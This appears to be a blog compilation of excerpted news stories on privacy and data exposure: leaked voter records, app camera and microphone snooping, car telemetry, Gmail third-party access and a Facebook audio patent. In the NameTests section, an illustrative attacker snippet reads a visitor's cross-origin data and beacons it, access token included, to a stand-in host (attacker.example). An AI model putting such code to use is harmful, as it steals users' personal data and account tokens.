Robocall Firm Exposes Hundreds of Thousands of US Voters’ Records

Personal details and political affiliations exposed

The server that drew Diachenko’s attention this time contained 2,584 files, which the researcher later connected to RoboCent.

The user data exposed via RoboCent’s bucket included:

  • Full name, suffix, prefix
  • Phone numbers (cell and landline)
  • Address with house, street, city, state, zip, precinct
  • Political affiliation provided by the state, or inferred from voting history
  • Age and birth year
  • Gender
  • Jurisdiction breakdown based on district, zip code, precinct, county, state
  • Demographics based on ethnicity, language, education

Other data found on the server, though not necessarily personal, included audio files with prerecorded political messages used for robocalls.

According to RoboCent’s website, the company was not only providing robo-calling services for political surveys and inquiries but was also selling this data in raw format.

“Clients can now purchase voter data directly from their RoboCall provider,” the company’s website reads. “We provide voter files for every need, whether it be for a new RoboCall or simply to update records for door knocking.”

The company sells voter records at 3¢ per record. Leaving the core of its business exposed online in an AWS bucket without authentication is… self-defeating.

Source: Robocall Firm Exposes Hundreds of Thousands of US Voters’ Records

Chinese mobile phone cameras are not-so-secretly recording users’ activities

It has been widely reported that software and web applications made in China are often built with a “backdoor” feature, allowing the manufacturer or the government to monitor and collect data from the user’s device.

But how exactly does the backdoor feature work? Recent discussion among mobile phone users in mainland China has shed some light on the question.

Last month, users of Vivo NEX, a Chinese Android phone, found that when they opened certain applications on the phone, including Chinese internet giant QQ browser and travel booking app Ctrip, the mobile device’s camera would self-activate.

Unlike most mobile phones, whose cameras can be activated without giving the user any signal, the Vivo NEX has a tiny retractable camera that physically pops out from the top of the device when it is turned on.

Vivo NEX retractable camera. Photo by Vivo NEX, via WeChat.

Though perhaps unintentionally, this design feature has given Chinese mobile users a tangible sense of exactly when and how they are being monitored.

One Weibo user observed that the retractable camera self-activates whenever he opens a new chat on Telegram, a messaging application designed for secure, encrypted communication.

While Telegram reacted quickly to reports of the issue and fixed the camera bug, Chinese internet giant Tencent defended the feature instead. It argued that its QQ browser needs the camera activated in order to be ready to scan QR codes, and insisted that the camera would not take photos or make audio recordings unless the user told it to.

This explanation was not reassuring for users, as it only revealed the degree to which the QQ browser could record users’ activities.

After the news of the self-activated camera bug spread, users started testing the issue on other applications and found that Baidu’s voice input application has access to both the camera and voice recording function, which can be launched without users’ authorization.

A Vivo NEX user found that once she had installed Baidu’s voice input system, it would activate the phone’s camera and sound recording function whenever she opened any application that allows text input, including chat apps and browsers.

Baidu says that the self-activated recording is not a backdoor but a “frontdoor” application that allows the company to collect and adjust to background noise in order to optimize its voice input function. This was not reassuring for users — any microphone collecting background noise would also unquestionably capture the voices and conversations of a user and whomever she speaks with face-to-face.

How does camera snooping affect people outside China?

These snooping features affect not only people in mainland China, but also anyone outside the country who wants to communicate with friends in China.

As the Chinese government has blocked most leading foreign social media technologies, anyone who wants to communicate with people in China has little choice but to install applications made in China, such as WeChat.

One strategy for increasing one’s mobile privacy when using Chinese-made applications is to keep all insecure applications on one device and assume that these communications will be recorded or spied upon, and to keep a second device for more secure or “clean” applications. When using an encrypted communication application like Telegram to communicate with friends in China, one also has to make sure that their friends’ mobile devices are clean.

Baidu has been notorious for snooping into users’ private data and activities. In January 2018, a government-affiliated consumer association in Jiangsu province filed a lawsuit against Baidu’s search application and mobile browser for snooping on users’ phone conversations and accessing their geo-location data without user consent. But the case was dropped in March after Baidu updated its applications to secure users’ consent for control over their mobile camera, voice recording, and geo-location data, even though these controls are not essential to the applications’ functionality.

In response to public concern about these backdoor features, Baidu and other Chinese internet giants may defend themselves simply by arguing that users have consented to having their cameras activated. But given the monopolistic nature of Chinese Internet giants in the country, do ordinary users have the power — or the choice — to say no?

Source: Chinese mobile phone cameras are not-so-secretly recording users’ activities – Global Voices Advox

Controversial copyright law rejected by EU parliament

A controversial overhaul of the EU’s copyright law that sparked a fierce debate between internet giants and content creators has been rejected.

The proposed rules would have put more responsibility on websites to check for copyright infringements, and forced platforms to pay for linking to news.

A slew of high-profile music stars had backed the change, arguing that websites had exploited their content.

But opponents said the rules would stifle internet freedom and creativity.

The move was intended to bring the EU’s copyright laws in line with the digital age, but led to protests from websites and much debate before it was rejected by a margin of 318-278 in the European Parliament on Thursday.

What were they voting for?

The proposed legislation – known as the Copyright Directive – was an attempt by the EU to modernise its copyright laws, but it contained two highly-contested parts.

The first of these, Article 11, was intended to protect newspapers and other outlets from internet giants like Google and Facebook using their material without payment.

But it was branded a “link tax” by opponents who feared it could lead to problems with sentence fragments being used to link to other news outlets (like this).

Article 13 was the other controversial part. It put a greater responsibility on websites to enforce copyright laws, and would have meant that any online platform that allowed users to post text, images, sounds or code would need a way to assess and filter content.

The most common way to do this is with an automated copyright-filtering system, but such systems are expensive. The one YouTube uses cost $60m (£53m), so critics were worried that similar filters would need to be introduced to every website if Article 13 became law.

There were also concerns that these copyright filters could effectively ban things like memes and remixes which use some copyrighted material.
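The mechanics of such an upload filter can be sketched in miniature. Real systems like YouTube’s Content ID match perceptual audio and video fingerprints; the exact-hash version below is a deliberately naive stand-in (the byte strings and work names are invented), and it also shows why crude filtering fails the moment a work is altered — exactly the remix-and-meme problem critics raised:

```python
import hashlib

# Toy database of "known copyrighted works", keyed by an exact SHA-256
# digest. A real filter would use perceptual fingerprints that survive
# re-encoding, cropping, and remixing; an exact hash does not.
KNOWN_FINGERPRINTS = {
    hashlib.sha256(b"hit-song-audio-bytes").hexdigest(): "Hit Song (Label X)",
}

def check_upload(upload_bytes: bytes):
    """Return the name of the matched work, or None if the upload looks clean."""
    fingerprint = hashlib.sha256(upload_bytes).hexdigest()
    return KNOWN_FINGERPRINTS.get(fingerprint)

print(check_upload(b"hit-song-audio-bytes"))   # exact copy -> flagged
print(check_upload(b"hit-song-audio-bytes!"))  # one byte changed -> missed
```

The gap between these two calls is the whole engineering problem: closing it requires fuzzy perceptual matching, which is what makes production filters so expensive — and so prone to over-blocking transformative uses.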

Source: Controversial copyright law rejected by EU parliament – BBC News

Very glad to see common sense prevailing here. Have you ever thought about how strange it would be if you could bill someone every time they read your email or your reports? How do musicians think it’s OK to bill people when they are not playing?

App Traps: How Cheap Smartphones Siphon User Data in Developing Countries

For millions of people buying inexpensive smartphones in developing countries where privacy protections are usually low, the convenience of on-the-go internet access could come with a hidden cost: preloaded apps that harvest users’ data without their knowledge.

One such app, included on thousands of Chinese-made Singtech P10 smartphones sold in Myanmar and Cambodia, sends the owner’s location and unique-device details to a mobile-advertising firm in Taiwan called General Mobile Corp., or GMobi. The app also has appeared on smartphones sold in Brazil and those made by manufacturers based in China and India, security researchers said.

Taipei-based GMobi, with a subsidiary in Shanghai, said it uses the data to show targeted ads on the devices. It also sometimes shares the data with device makers to help them learn more about their customers.

Smartphones have been billed as a transformative technology in developing markets, bringing low-cost internet access to hundreds of millions of people. But this growing population of novice consumers, most of them living in countries with lax or nonexistent privacy protections, is also a juicy target for data harvesters, according to security researchers.

Smartphone makers that allow GMobi to install its app on the phones they sell can use the app to push software updates for their devices, known as “firmware” updates, at no cost to them, said GMobi Chief Executive Paul Wu. That benefit is an important consideration for device makers pushing low-cost phones across emerging markets.

“If end users want a free internet service, he or she needs to suffer a little for better targeting ads,” said a GMobi spokeswoman.

[…]

Upstream Systems, a London-based mobile commerce and security firm that identified the GMobi app’s activity and shared it with the Journal, said it bought four new devices that, once activated, began sending data to GMobi via its firmware-updating app. This included 15-digit International Mobile Equipment Identity, or IMEI, numbers, along with unique codes called MAC addresses that are assigned to each piece of hardware that connects to the web. The app also sends some location data to GMobi’s servers located in Singapore, Upstream said.
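To make concrete what “IMEI plus MAC address plus location” adds up to, here is a hypothetical sketch of such a telemetry report. Every field name, value, and the payload structure are invented for illustration — nothing here reflects GMobi’s actual protocol — but the privacy point holds: unlike an advertising ID, these hardware identifiers cannot be reset by the user.

```python
import json

def build_telemetry(imei: str, mac: str, lat: float, lon: float) -> str:
    """Assemble a device-identifying report of the kind Upstream describes.

    The IMEI and MAC address are fixed hardware identifiers: a user cannot
    reset them, so any server receiving this payload can correlate and track
    the device for its entire lifetime.
    """
    payload = {
        "imei": imei,                          # 15-digit hardware identity
        "mac": mac,                            # network interface address
        "location": {"lat": lat, "lon": lon},  # approximate device position
    }
    return json.dumps(payload)

# Example values (a published IMEI test number and a locally-administered MAC).
report = build_telemetry("356938035643809", "02:00:5e:10:00:0f", 16.8409, 96.1735)
print(report)
```

One such report is near-worthless; a stream of them, keyed to an unresettable identifier, is a longitudinal movement history — which is why researchers treat IMEI and MAC collection as far more invasive than ad-ID tracking.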

Source: App Traps: How Cheap Smartphones Siphon User Data in Developing Countries – WSJ

 

I like the way even GMobi thinks users getting targeted advertising are suffering!

Mitsubishi Wants Your Driving Data, and It’s Willing to Throw in a Free Cup of Coffee to Get It

Automakers want in on the highly lucrative big data game and Mitsubishi is willing to pay for the privilege. In exchange for running the risk of jacking up its customers’ insurance premiums, the car manufacturer is offering drivers $10 off of an oil change and other rewards. Consumers will have to decide if a gift card is worth giving up their privacy.

According to the Wall Street Journal, Mitsubishi’s new smartphone app is the first of its kind. A driver can sign up and allow their driving habits to be tracked by their phone’s sensors, which monitor data points like acceleration, location, and rotation. Along the way, they’ll earn badges (reward points) based on good driving practices like staying under the speed limit. For now, the badges can be exchanged for discounted oil changes or car accessories, but the company plans to expand its incentives to other small perks like free cups of coffee by the end of the year.

It may seem like a win-win situation: You pay a little more attention to being a good driver and you get a little bonus for your efforts. But the first customer for all that data is State Auto Insurance Companies, which will be using it to create better risk models and adjust users’ premiums accordingly. It doesn’t appear that the data will be anonymized because the Journal reports that, after a trial period, insurers will be able to build a customer risk profile on users of the app that will then be used to determine rates. We reached out to Mitsubishi to ask about its anonymization of data but didn’t receive an immediate reply.

Mike LaRocco, State Auto’s CEO, framed this as a benefit to consumers when speaking with the Journal. “They’ll get a much more accurate quote from day one,” he claimed. That might be true, but it does nothing to assuage fears that insurance companies could penalize drivers who don’t voluntarily give up their data.

Ford also has an app that shares data with insurance companies, but it’s not offering any of those sweet, sweet gift cards. And at a moment when many people are debating whether tech giants should be paying us for our data, one could argue that Mitsubishi is doing the right thing. But as car companies build web connectivity into their new models, we could easily see this become standard practice without offering drivers a choice or a reward. A 2016 study by McKinsey & Co. estimated that monetizing car data could be worth between $450 billion and $750 billion by 2030. Of course, autonomous vehicles could become more prevalent by then. And as long as they work as promised, insurance companies will be less necessary.

[Wall Street Journal]

Source: Mitsubishi Wants Your Driving Data, and It’s Willing to Throw in a Free Cup of Coffee to Get It

‘Plane Hacker’ Roberts: I put a network sniffer on my truck to see what it was sharing. Holy crap!

Cars are turning into computers on wheels and airplanes have become flying data centres, but this increase in power and connectivity has largely happened without designing in adequate security controls.

Improving transportation security was a major strand of the recent Cyber Week security conference in Israel. A one-day event, Speed of Light, focused on transportation cybersecurity, where Roberts served as master of ceremonies.

[…]

“Israel was here, not just a couple of companies. Israel is going, ‘We as a state, we as a country, need to understand [about transportation security]’,” Roberts said. “We need to learn.”

“In other places it’s the companies. GM is great. Ford is good. Some of the German companies are good. Fiat-Chrysler Group has got a lot of work to do.”

Some industries are more advanced than others at understanding cybersecurity risks, Roberts claimed. For example, awareness in the automobile industry is ahead of that found in aviation.

“Boeing is in denial. Airbus is kind of on the fence. Some of the other industries are better.”

[…]

There’s almost nothing you can do [as a user] to improve car security. The only thing you can do is go back to the garage every month for the car equivalent of Microsoft’s Patch Tuesday: updates from Ford or GM.

“You better come in once a month for your patches because if you don’t, the damn thing is not going to work.”

What about over-the-air updates? These may not always be reliable, Roberts warned.

“What happens if you’re in the middle of a dead spot? Or you’re in the middle of a developing country that doesn’t have that? What about the Toyotas that get sold to the Middle East or Far East, to countries that don’t have 4G or 5G coverage? And what happens when you move around countries?”

[…]

“I put a network sniffer on the big truck to see what it was sharing. Holy crap! The GPS, the telemetry, the tracking. There’s a lot of data this thing is sharing.

“If you turn it off you might be voiding warranties or [bypassing] security controls,” Roberts said, adding that there was also an issue about who owns the data a car generates. “Is it there to protect me or monitor me?” he mused.

Some insurance firms offer cheaper insurance to careful drivers, based on readings from telemetry devices and sensors. Roberts is dead set against this for privacy reasons. “Insurance can go to hell. For me, getting a 5 per cent discount on my insurance is not worth accepting a tracking device from an insurance company.”

Source: ‘Plane Hacker’ Roberts: I put a network sniffer on my truck to see what it was sharing. Holy crap! • The Register

Is Facebook a publisher? In public it says no, but in court it says yes

Facebook has long had the same public response when questioned about its disruption of the news industry: it is a tech platform, not a publisher or a media company.

But in a small courtroom in California’s Redwood City on Monday, attorneys for the social media company presented a different message from the one executives have made to Congress, in interviews and in speeches: Facebook, they repeatedly argued, is a publisher, and a company that makes editorial decisions, which are protected by the first amendment.

The contradictory claim is Facebook’s latest tactic against a high-profile lawsuit, exposing a growing tension for the Silicon Valley corporation, which has long presented itself as a neutral platform that does not have traditional journalistic responsibilities.

The suit, filed by an app startup, alleges that Mark Zuckerberg developed a “malicious and fraudulent scheme” to exploit users’ personal data and force rival companies out of business. Facebook, meanwhile, is arguing that its decisions about “what not to publish” should be protected because it is a “publisher”.

In court, Sonal Mehta, a lawyer for Facebook, even drew comparison with traditional media: “The publisher discretion is a free speech right irrespective of what technological means is used. A newspaper has a publisher function whether they are doing it on their website, in a printed copy or through the news alerts.”

The plaintiff, a former startup called Six4Three, first filed the suit in 2015 after Facebook removed app developers’ access to friends’ data. The company had built a controversial and ultimately failed app called Pikinis, which allowed people to filter photos to find ones with people in bikinis and other swimwear.

Six4Three attorneys have alleged that Facebook enticed developers to create apps for its platform by implying creators would have long-term access to the site’s huge amounts of valuable personal data and then later cut off access, effectively defrauding them. The case delves into some of the privacy concerns sparked by the Cambridge Analytica scandal.

Source: Is Facebook a publisher? In public it says no, but in court it says yes | Technology | The Guardian

More on how social media hacks brains to addict users

In a follow-up to How programmers addict you to social media, games and your mobile phone

Ex-Facebook president Sean Parker: site made to exploit human ‘vulnerability’

He explained that when Facebook was being developed the objective was: “How do we consume as much of your time and conscious attention as possible?” It was this mindset that led to the creation of features such as the “like” button that would give users “a little dopamine hit” to encourage them to upload more content.

“It’s a social-validation feedback loop … exactly the kind of thing that a hacker like myself would come up with, because you’re exploiting a vulnerability in human psychology.”

[…]

Parker is not the only Silicon Valley entrepreneur to express regret over the technologies he helped to develop. The former Googler Tristan Harris is one of several technologists who, in interviews with the Guardian in October, criticized the industry.

“All of us are jacked into this system,” he said. “All of our minds can be hijacked. Our choices are not as free as we think they are.”

Aza Raskin on Google Search Results and How He Invented the Infinite Scroll

Social media apps are ‘deliberately’ addictive to users

Social media companies are deliberately addicting users to their products for financial gain, Silicon Valley insiders have told the BBC’s Panorama programme.

“It’s as if they’re taking behavioural cocaine and just sprinkling it all over your interface and that’s the thing that keeps you like coming back and back and back”, said former Mozilla and Jawbone employee Aza Raskin.

“Behind every screen on your phone, there are generally like literally a thousand engineers that have worked on this thing to try to make it maximally addicting” he added.

In 2006 Mr Raskin, a leading technology engineer himself, designed infinite scroll, one of the features of many apps that is now seen as highly habit forming. At the time, he was working for Humanized – a computer user-interface consultancy.

Aza Raskin says he did not recognise how addictive infinite scroll could be

Infinite scroll allows users to endlessly swipe down through content without clicking.

“If you don’t give your brain time to catch up with your impulses,” Mr Raskin said, “you just keep scrolling.”

He said the innovation kept users looking at their phones far longer than necessary.

Mr Raskin said he had not set out to addict people and now felt guilty about it.

But, he said, many designers were driven to create addictive app features by the business models of the big companies that employed them.

“In order to get the next round of funding, in order to get your stock price up, the amount of time that people spend on your app has to go up,” he said.

“So, when you put that much pressure on that one number, you’re going to start trying to invent new ways of getting people to stay hooked.”

Is My Phone Recording Everything I Say? It turns out it sends screenshots and videos of what you do

Some computer science academics at Northeastern University had heard enough people talking about this technological myth that they decided to do a rigorous study to tackle it. For the last year, Elleen Pan, Jingjing Ren, Martina Lindorfer, Christo Wilson, and David Choffnes ran an experiment involving more than 17,000 of the most popular apps on Android to find out whether any of them were secretly using the phone’s mic to capture audio. The apps included those belonging to Facebook, as well as over 8,000 apps that send information to Facebook.

Sorry, conspiracy theorists: They found no evidence of an app unexpectedly activating the microphone or sending audio out when not prompted to do so. Like good scientists, they refuse to say that their study definitively proves that your phone isn’t secretly listening to you, but they didn’t find a single instance of it happening. Instead, they discovered a different disturbing practice: apps recording a phone’s screen and sending that information out to third parties.

Of the 17,260 apps the researchers looked at, over 9,000 had permission to access the camera and microphone, and thus the potential to overhear the phone’s owner talking about their need for cat litter or how much they love a certain brand of gelato. Using 10 Android phones, the researchers ran an automated program that interacted with each of those apps, then analyzed the traffic generated. (A limitation of the study is that the automated phone users couldn’t do things humans could, like creating usernames and passwords to sign into an account on an app.) They were looking specifically for any media files that were sent, particularly when they were sent to an unexpected party.

These phones played with thousands of apps to see if any would secretly activate the microphone
Photo: David Choffnes (Northeastern University)

The strange practice they started to see was that screenshots and video recordings of what people were doing in apps were being sent to third party domains. For example, when one of the phones used an app from GoPuff, a delivery start-up for people who have sudden cravings for junk food, the interaction with the app was recorded and sent to a domain affiliated with Appsee, a mobile analytics company. The video included a screen where you could enter personal information—in this case, their zip code.
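The detection step the researchers describe — spotting media files leaving the device for an unexpected party — can be sketched as a simple filter over decoded traffic records. This is an assumed reconstruction, not the authors’ actual tooling, and the hostnames below are invented placeholders:

```python
# Media payloads are identified by their MIME content type.
MEDIA_TYPES = ("image/", "video/", "audio/")

def flag_media_uploads(records, expected_hosts):
    """Return outbound records that carry media to hosts the app has no
    obvious business sending media to (e.g. a third-party analytics domain)."""
    return [
        r for r in records
        if r["content_type"].startswith(MEDIA_TYPES)  # startswith accepts a tuple
        and r["host"] not in expected_hosts
    ]

# Toy traffic capture from one automated app session (hosts invented).
records = [
    {"host": "api.gopuff.example",    "content_type": "application/json"},
    {"host": "upload.appsee.example", "content_type": "video/mp4"},
]
suspicious = flag_media_uploads(records, expected_hosts={"api.gopuff.example"})
print(suspicious)  # the screen-recording upload to the analytics domain
```

The hard part in practice is everything upstream of this filter — instrumenting the phones, decrypting or intercepting TLS traffic, and attributing each flow to an app — but the final judgement reduces to roughly this test: media content, unexpected destination.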

[…]

In other words, until smartphone makers notify you when your screen is being recorded or give you the power to turn that ability off, you have a new thing to be paranoid about. The researchers will be presenting their work at the Privacy Enhancing Technology Symposium Conference in Barcelona next month. (While in Spain, they might want to check out the country’s most popular soccer app, which has given itself permission to access users’ smartphone mics to listen for illegal broadcasts of games in bars.)

The researchers weren’t comfortable saying for sure that your phone isn’t secretly listening to you in part because there are some scenarios not covered by their study. Their phones were being operated by an automated program, not by actual humans, so they might not have triggered apps the same way a flesh-and-blood user would. And the phones were in a controlled environment, not wandering the world in a way that might trigger them: For the first few months of the study the phones were near students in a lab at Northeastern University and thus surrounded by ambient conversation, but the phones made so much noise, as apps were constantly being played with on them, that they were eventually moved into a closet. (If the researchers did the experiment again, they would play a podcast on a loop in the closet next to the phones.) It’s also possible that the researchers could have missed audio recordings of conversations if the app transcribed the conversation to text on the phone before sending it out. So the myth can’t be entirely killed yet.

Source: Is My Phone Recording Everything I Say?

Europe is reading smartphones and using the data as a weapon to deport refugees

Across the continent, migrants are being confronted by a booming mobile forensics industry that specialises in extracting a smartphone’s messages, location history, and even WhatsApp data. That information can potentially be turned against the phone owners themselves.

In 2017 both Germany and Denmark expanded laws that enabled immigration officials to extract data from asylum seekers’ phones. Similar legislation has been proposed in Belgium and Austria, while the UK and Norway have been searching asylum seekers’ devices for years.

Following right-wing gains across the EU, beleaguered governments are scrambling to bring immigration numbers down. Tackling fraudulent asylum applications seems like an easy way to do that. As European leaders met in Brussels last week to thrash out a new, tougher framework to manage migration —which nevertheless seems insufficient to placate Angela Merkel’s critics in Germany— immigration agencies across Europe are showing new enthusiasm for laws and software that enable phone data to be used in deportation cases.

Admittedly, some refugees do lie on their asylum applications. Omar – not his real name – certainly did. He travelled to Germany via Greece. Even for Syrians like him there were few legal alternatives into the EU. But his route meant he could face deportation under the EU’s Dublin regulation, which dictates that asylum seekers must claim refugee status in the first EU country they arrive in. For Omar, that would mean settling in Greece – hardly an attractive destination considering its high unemployment and stretched social services.

Last year, more than 7,000 people were deported from Germany according to the Dublin regulation. If Omar’s phone were searched, he could have become one of them, as his location history would have revealed his route through Europe, including his arrival in Greece.

But before his asylum interview, he met Lena – also not her real name. A refugee advocate and businesswoman, Lena had read about Germany’s new surveillance laws. She encouraged Omar to throw his phone away and tell immigration officials it had been stolen in the refugee camp where he was staying. “This camp was well-known for crime,” says Lena, “so the story seemed believable.” His application is still pending.

Omar is not the only asylum seeker to hide phone data from state officials. When sociology professor Marie Gillespie researched phone use among migrants travelling to Europe in 2016, she encountered widespread fear of mobile phone surveillance. “Mobile phones were facilitators and enablers of their journeys, but they also posed a threat,” she says. In response, she saw migrants who kept up to 13 different SIM cards, hiding them in different parts of their bodies as they travelled.

[…]

Denmark is taking this a step further, by asking migrants for their Facebook passwords. Refugee groups note how the platform is being used more and more to verify an asylum seeker’s identity.

[…]

The Danish immigration agency confirmed that it does ask to see asylum applicants’ Facebook profiles. While it is not standard procedure, the check can be used if a caseworker feels they need more information. If an applicant refuses consent, they are told they are obliged under Danish law to comply. Right now, the agency only uses Facebook – not Instagram or other social platforms.

[…]

“In my view, it’s a violation of ethics on privacy to ask for a password to Facebook or open somebody’s mobile phone,” says Michala Clante Bendixen of Denmark’s Refugees Welcome movement. “For an asylum seeker, this is often the only piece of personal and private space he or she has left.”

Information sourced from phones and social media offers an alternative reality that can compete with an asylum seeker’s own testimony. “They’re holding the phone to be a stronger testament to their history than what the person is ready to disclose,” says Gus Hosein, executive director of Privacy International. “That’s unprecedented.”

Privacy campaigners note how digital information might not reflect a person’s character accurately. “Because there is so much data on a person’s phone, you can make quite sweeping judgements that might not necessarily be true,” says Christopher Weatherhead, technologist at Privacy International.

[…]

Privacy International has investigated the UK police’s ability to search phones, indicating that immigration officials could possess similar powers. “What surprised us was the level of detail of these phone searches. Police could access information that even you don’t have access to, such as deleted messages,” Weatherhead says.

His team found that British police are aided by Israeli mobile forensic company Cellebrite. Using their software, officials can access search history, including deleted browsing history. It can also extract WhatsApp messages from some Android phones.

Source: Europe is using smartphone data as a weapon to deport refugees | WIRED UK

Google allows outside app developers to read people’s Gmails

  • Google promised a year ago to provide more privacy to Gmail users, but The Wall Street Journal reports that hundreds of app makers have access to millions of inboxes belonging to Gmail users.
  • The outside app companies receive access to messages from Gmail users who signed up for things like price-comparison services or automated travel-itinerary planners, according to The Journal.
  • Some of these companies train software to scan the email, while others enable their workers to pore over private messages, the report says.
  • What isn’t clear from The Journal’s story is whether Google is doing anything differently than Microsoft or other rival email services.

Employees working for hundreds of software developers are reading the private messages of Gmail users, The Wall Street Journal reported on Monday.

A year ago, Google promised to stop scanning the inboxes of Gmail users, but the company has not done much to protect Gmail inboxes obtained by outside software developers, according to the newspaper. Gmail users who signed up for “email-based services” like “shopping price comparisons,” and “automated travel-itinerary planners” are most at risk of having their private messages read, The Journal reported.

Hundreds of app developers electronically “scan” inboxes of the people who signed up for some of these programs, and in some cases, employees do the reading, the paper reported. Google declined to comment.

The revelation comes at a bad time for Google and Gmail, the world’s largest email service, with 1.4 billion users. Top tech companies are under pressure in the United States and Europe to do more to protect user privacy and be more transparent about any parties with access to people’s data. The increased scrutiny follows the Cambridge Analytica scandal, in which a data firm was accused of misusing the personal information of more than 80 million Facebook users in an attempt to sway elections.

It’s not news that Google and many top email providers enable outside developers to access users’ inboxes. In most cases, the people who signed up for the price-comparison deals or other programs agreed to provide access to their inboxes as part of the opt-in process.

Gmail’s opt-in alert spells out generally what a user is agreeing to.
Image: Google

In Google’s case, outside developers must pass a vetting process, and as part of that, Google ensures they have an acceptable privacy agreement, The Journal reported, citing a Google representative.

What is unclear is how closely these outside developers adhere to their agreements and whether Google does anything to ensure they do, as well as whether Gmail users are fully aware that individual employees may be reading their emails, as opposed to an automated system, the report says.

Mikael Berner, the CEO of Edison Software, a Gmail developer that offers a mobile app for organizing email, told The Journal that its employees had read emails from hundreds of Gmail users as part of an effort to build a new feature. An executive at another company said employees’ reading of emails had become “common practice.”

Companies that spoke to The Journal confirmed that the practice was specified in their user agreements and said they had implemented strict rules for employees regarding the handling of email.

It’s interesting to note that, judging from The Journal’s story, very little indicates that Google is doing anything different from Microsoft or other top email providers. According to the newspaper, nothing in Microsoft or Yahoo’s policy agreements explicitly allows people to read others’ emails.

Source: Google reportedly allows outside app developers to read people’s Gmails – INSIDER

Which also shows: no one ever reads end-user agreements. I’m pretty sure nobody caught the bit that said “you are also allowing us to read all your emails” when they signed up.

Dear Samsung mobe owners: It may leak your private pics to randoms

Samsung’s Messages app bundled with the South Korean giant’s latest smartphones and tablets may silently send people’s private photos to random contacts, it is claimed.

An unlucky bunch of Sammy phone fans – including owners of Galaxy S9, S9+ and Note 8 gadgets – have complained on Reddit and the official support forums that the application texted their snaps without permission.

One person said the app sent their photo albums to their girlfriend at 2.30am without them knowing – there was no trace of the transfer on the phone, although it showed up in their T-Mobile US account. The pictures, like the recipients, are seemingly picked at random from the handset’s contacts, and the messages do not appear in the application’s sent box. The seemingly misbehaving app is the default messaging tool on Samsung’s Android devices.

“Last night around 2:30am, my phone sent [my girlfriend] my entire photo gallery over text but there was no record of it on my messages app,” complained one confused Galaxy S9+ owner. “However, there was record of it [in my] T-Mobile logs.”

Another S9+ punter chipped in: “Oddly enough, my wife’s phone did that last night, and mine did it the night before. I think it has something to do with the Samsung SMS app being updated from the Galaxy Store. When her phone texted me her gallery, it didn’t show up on her end – and vice versa.”

Source: Dear Samsung mobe owners: It may leak your private pics to randoms • The Register

This popular Facebook app publicly exposed your data for years

Nametests.com, the website behind the quizzes, recently fixed a flaw that publicly exposed information of their more than 120 million monthly users — even after they deleted the app. At my request, Facebook donated $8,000 to the Freedom of the Press Foundation as part of their Data Abuse Bounty Program.

[…]

While loading a test, the website would fetch my personal information and display it on the webpage. Here’s where it got my personal information from:

http://nametests.com/appconfig_user

In theory, every website could have requested this data. Note that the data also includes a ‘token’ which gives access to all data the user authorised the application to access, such as photos, posts and friends.

I was shocked to see that this data was publicly available to any third-party that requested it.

In a normal situation, other websites would not be able to access this information: web browsers have mechanisms in place (the same-origin policy) to prevent that from happening. In this case, however, the data was wrapped in JavaScript, which is an exception to this rule.

One of the basic principles of JavaScript is that it can be shared with other websites. Since NameTests delivered their users’ personal data in a JavaScript file, virtually any website could access it simply by requesting it.

To verify it would actually be that easy to steal someone’s information, I set up a website that would connect to NameTests and fetch some information about my visitor. NameTests would also provide a secret key called an access token, which, depending on the permissions granted, could be used to gain access to a visitor’s posts, photos and friends. It would take only one visit to our website to gain access to someone’s personal information for up to two months.
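The attack the researcher describes can be sketched in a few lines of hypothetical attacker HTML. Everything here apart from the endpoint URL is invented for illustration – the global variable name and the exfiltration address are assumptions:

```html
<!-- Hypothetical attacker page: because NameTests served the visitor's
     data as a JavaScript file, any site could include it cross-origin. -->
<script src="http://nametests.com/appconfig_user"></script>
<script>
  // The included file defined the visitor's data in a global variable
  // (exact name assumed here), so this page can now read it and ship it
  // off, access token included.
  var stolen = window.userData;   // name, token, etc. (assumed shape)
  navigator.sendBeacon('https://attacker.example/steal',
                       JSON.stringify(stolen));
</script>
```

Had the endpoint returned plain JSON instead, the browser’s same-origin policy would have stopped a third-party page from reading the response at all.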

Video proof:

An unauthorised website getting access to my Facebook information

As you can see in the video, NameTests would still reveal your identity even after deleting the app. In order to prevent this from happening, the user would have had to manually delete the cookies on their device, since NameTests.com does not offer a log out functionality.

Source: This popular Facebook app publicly exposed your data for years

Facebook Patent Imagines Triggering Your Phone’s Mic When a Hidden Signal Plays on TV

You may have seen the ads that Facebook has been running on TV in a full-court press to apologize for abusing users’ privacy. They’re embarrassing. And, it turns out, they may be a sign of things to come. Based on a recently published patent application, Facebook could one day use ads on television to further violate your privacy once you’ve forgotten about all those other times.

First spotted by Metro, the patent is titled “broadcast content view analysis based on ambient audio recording.” (PDF) It describes a system in which an “ambient audio fingerprint or signature” that’s inaudible to the human ear could be embedded in broadcast content like a TV ad. When a hypothetical user is watching this ad, the audio fingerprint could trigger their smartphone or another device to turn on its microphone, begin recording audio and transmit data about it to Facebook.
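The patent doesn’t say how the inaudible marker would be encoded, but a classic, cheap way to spot a single near-ultrasonic tone in a microphone feed is the Goertzel algorithm. The frequencies and block size below are assumptions for illustration, not details from the patent:

```python
import math

def goertzel_power(samples, sample_rate, target_hz):
    """Return the signal power at target_hz for one block of samples."""
    n = len(samples)
    k = round(n * target_hz / sample_rate)   # nearest DFT bin
    w = 2.0 * math.pi * k / n
    coeff = 2.0 * math.cos(w)
    s_prev = s_prev2 = 0.0
    for x in samples:
        s = x + coeff * s_prev - s_prev2
        s_prev2, s_prev = s_prev, s
    # Standard Goertzel magnitude-squared at bin k
    return s_prev2**2 + s_prev**2 - coeff * s_prev * s_prev2

FS = 44_100                                  # assumed sample rate
# An assumed 18 kHz marker (inaudible to most adults) vs. ordinary audio:
marker = [math.sin(2 * math.pi * 18_000 * t / FS) for t in range(1024)]
speech = [math.sin(2 * math.pi * 440 * t / FS) for t in range(1024)]

# The marker stands out by orders of magnitude at its own frequency bin:
print(goertzel_power(marker, FS, 18_000) >
      1000 * goertzel_power(speech, FS, 18_000))   # → True
```

A device running a loop like this per audio block could wake up the full recording path only when the watermark’s bin lights up, which matches the “trigger” behaviour the patent describes.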

Diagram of soundwave containing signal, triggering device, and recording ambient audio.
Image: USPTO

Everything in the patent is written in legalese and is a bit vague about what happens to the audio data. One example scenario imagines that various ambient audio would be eliminated and the content playing on the broadcast would be identified. Data would be collected about the user’s proximity to the audio. Then, the identifying information, time, and identity of the Facebook user would be sent to the social media company for further processing.

